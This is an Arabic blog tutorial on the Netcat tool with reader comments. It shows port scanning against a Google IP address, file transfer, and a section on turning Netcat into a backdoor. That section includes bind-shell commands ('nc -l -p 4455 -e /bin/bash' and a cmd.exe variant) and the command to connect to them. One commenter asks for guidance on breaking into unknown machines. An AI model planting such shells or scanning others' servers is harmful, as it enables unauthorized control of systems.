شرح أداة Netcat – The Swiss Army Knife

كتب بتاريخ: Jan 22nd, 2008 | بواسطة: عبدالمهيمن

السلام عليكم ورحمة الله وبركاته

netcat-logo.png
Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools

استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها

فحص المنافذ المفتوحة في السيرفر

تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
بهذه العملية نستعمل الأمر

nc -v -w1 SERVER-IP -z FromPort-ToPort

أما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ

مثال على ذلك

nc -v -w1 64.233.183.147 -z 1-100

ولفحص أكثر من نطاق منافذ نستعمل الأمر

nc -v -w1 -z 64.233.183.147 -z 1-100 400-500

ملاحظة: 64.233.183.147 هو IP موقع Google

نقل الملفات بين جهازك والسيرفر

من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل

nc SERVER-IP PORT < FILE

ونطبق الأمر في الجهاز المستقبل

nc -l -p PORT > FILE

مثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا

nc 192.168.0.45 5555 < data.txt

أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر

nc -l -p 5555 > data.txt

جعل الـ Netcat تعمل كـ Backdoor

هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر

nc -l -p PORT -e PROGRAM

مع اضافة -d و -L في ويندوز ليصبح الأمر

nc -l -p PORT -d -e PROGRAM -L

مثال على هذه الخاصية نقوم بتطبيق الأمر

nc -l -p 4455 -e /bin/bash

على السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل

nc -l -p 4455 -e -d cmd.exe -L

وللاتصال بالسيرفر نطبق الأمر

nc -v -n SERVER-IP 4455

وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر

nc -h

تحميل أداة Netcat لنظام لينوكس | تحميل أداة Netcat لنظام ويندوز

ان أصبت فمن الله وان أخطأت فمن نفسي ومن الشيطان

أرجو أن ينال الشرح اعجابكم
تحياتي Br4v3-H34r7.

التصنيف: Hacking & Security | عدد المشاهدات 17,610 | عدد التعليقات 50

رابط التعقيبات التعليقات RSS
x

أرسل الى صديق





أرسل الموضوع
twitter del.icio.us digg reddit stumbleupon facebook technorati google yahoo

التعليقات
  1. 46- kasper-ksa كتب بتاريخ: 10 Feb 2010 الساعة: 3:07 AM

    اشكرك حبيبي عبد المهيمن ووفقك الله لما يحبه ويرضاة ننتضر المزيد

  2. 47- 4LG£rI4N-H4CKER كتب بتاريخ: 08 Mar 2010 الساعة: 5:22 PM

    شرح صافي وافي

  3. 48- DZ-H-B كتب بتاريخ: 11 Mar 2010 الساعة: 2:58 PM

    ربي يجازيك خويا لعزيز ….. افضل المدونات لي زرتها بحياتي شكرا اخي
    لو تتفضل و تساهم في رفع مستوى اخوانك بوضع موضوع عن اختراق جهاز مجهول على الشبكة بشكل مباشر ……..كل التوفيق خي

  4. 49- عبدالرحمن كتب بتاريخ: 03 Apr 2010 الساعة: 12:44 AM

    دمت للتاريخ محرابا مهابا
    وفقك الله اخي
    بس عمرك 19

    ربنا يديمكl لدينك و لاهلك ووطنك وامتك

  5. 50- amusgame كتب بتاريخ: 05 May 2010 الساعة: 3:29 PM

    شكرا جزيلا لك شرح رائع جدا

الصفحات: « 1 2 3 [4] أظهر جميع التعليقات
المشاركة بتعليق

               


أعلى الصفحة